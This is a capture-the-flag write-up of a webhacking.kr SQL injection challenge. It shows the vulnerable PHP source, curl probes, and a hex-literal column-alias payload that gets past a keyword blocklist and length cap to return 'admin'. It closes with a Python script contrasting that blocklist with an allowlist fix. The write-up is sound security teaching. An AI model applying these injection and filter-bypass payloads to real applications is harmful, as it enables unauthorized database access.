old-61 -- SQLi (Value As Column)

URL: https://webhacking.kr/challenge/web-38/?view_source=1

<?php
include "../../config.php";
if ($_GET["view_source"]) { view_source(); }

$db = dbconnect();
if (!$_GET["id"]) { $_GET["id"] = "guest"; }

echo "<html><head><title>Challenge 61</title></head><body>";
echo "<a href=./?view_source=1>view-source</a><hr>";

$_GET["id"] = addslashes($_GET["id"]);

if (preg_match("/\(|\)|select|from|,|by|\./i", $_GET["id"])) { exit("Access Denied"); }
if (strlen($_GET["id"]) > 15) { exit("Access Denied"); }

$result = mysqli_fetch_array(
    mysqli_query(
        $db, "select {$_GET["id"]} from chall61 order by id desc limit 1"
    )
);

echo "<b>{$result["id"]}</b><br>";
if ($result["id"] == "admin") { solve(61); }
echo "</body></html>";
?>

In this SQLi challenge we control what is selected from the table, i.e. the column position of the query. The regex filter on the id parameter rules out subqueries, and the value is capped at 15 characters.

└─$ curl 'https://webhacking.kr/challenge/web-38/?id=guest' -b 'PHPSESSID=fqn9tv8tbam8b4gi2edk8vc8bu' -s | grep -oE '<b>(.*)</b>'
<b></b>
└─$ curl 'https://webhacking.kr/challenge/web-38/?id=id' -b 'PHPSESSID=fqn9tv8tbam8b4gi2edk8vc8bu' -s | grep -oE '<b>(.*)</b>'
<b>test</b>
└─$ curl 'https://webhacking.kr/challenge/web-38/?id=*' -b 'PHPSESSID=fqn9tv8tbam8b4gi2edk8vc8bu' -s | grep -oE '<b>(.*)</b>'
<b>test</b>

The table only has one column, but we need id to be admin. Since we control the select list, we can inject a literal aliased as the column, e.g. "admin" as id, which should return admin.

└─$ curl 'https://webhacking.kr/challenge/web-38/?id=1337+as+id' -b 'PHPSESSID=fqn9tv8tbam8b4gi2edk8vc8bu' -s | grep -oE '<b>(.*)</b>'
<b>1337</b>

The addslashes function prevents the use of quotes, but MySQL accepts hex literals as strings: admin -> 0x61646d696e

The payload would be 0x61646d696e as id, but that exceeds the 15-character limit and we get Access Denied. Another thing about value-as-column is that the as keyword is optional in MySQL, so it can be omitted.

Final payload: 0x61646d696e id
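To see why the blocklist lets the final payload through while an allowlist would not, here is an added Python re-implementation of the challenge's checks; it is not the challenge's own code, and the allowlist check with its ALLOWED_COLUMNS set is my assumed fix, not part of the challenge.

```python
import re

# Blocklist regex and length cap replicated from the challenge's PHP source.
BLOCKLIST = re.compile(r"\(|\)|select|from|,|by|\.", re.IGNORECASE)
MAX_LEN = 15
# Assumed hardened alternative: only real column names of chall61 are accepted.
ALLOWED_COLUMNS = {"id"}


def addslashes(s: str) -> str:
    """Mimic PHP addslashes(): escape backslash, both quote styles and NUL."""
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\x00", "\\0"))


def blocklist_allows(column: str) -> bool:
    """The challenge's filter: escape quotes, reject listed tokens, cap length."""
    column = addslashes(column)
    if BLOCKLIST.search(column):
        return False
    return len(column) <= MAX_LEN


def allowlist_allows(column: str) -> bool:
    """Hardened check: an identifier position must match a known column name."""
    return column in ALLOWED_COLUMNS


def build_query(column: str) -> str:
    """Same query shape as the challenge, shown for the accepted values."""
    return f"select {column} from chall61 order by id desc limit 1"


def hex_literal_decodes_to(hexlit: str) -> str:
    """MySQL reads 0x... as a string literal; show what the bytes spell."""
    return bytes.fromhex(hexlit[2:]).decode()


if __name__ == "__main__":
    # Candidate values from the write-up plus one subquery the regex catches.
    for cand in ["id", "*", "1337 as id", "(select 1)",
                 "0x61646d696e as id", "0x61646d696e id"]:
        print(f"{cand!r:24} blocklist={blocklist_allows(cand)!s:5} "
              f"allowlist={allowlist_allows(cand)}")
        if blocklist_allows(cand):
            print("   ->", build_query(cand))
    print("0x61646d696e ->", hex_literal_decodes_to("0x61646d696e"))
```

The blocklist accepts the 15-character alias form while rejecting the 18-character one, which is exactly the gap the write-up exploits; the allowlist rejects everything but the real column name.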
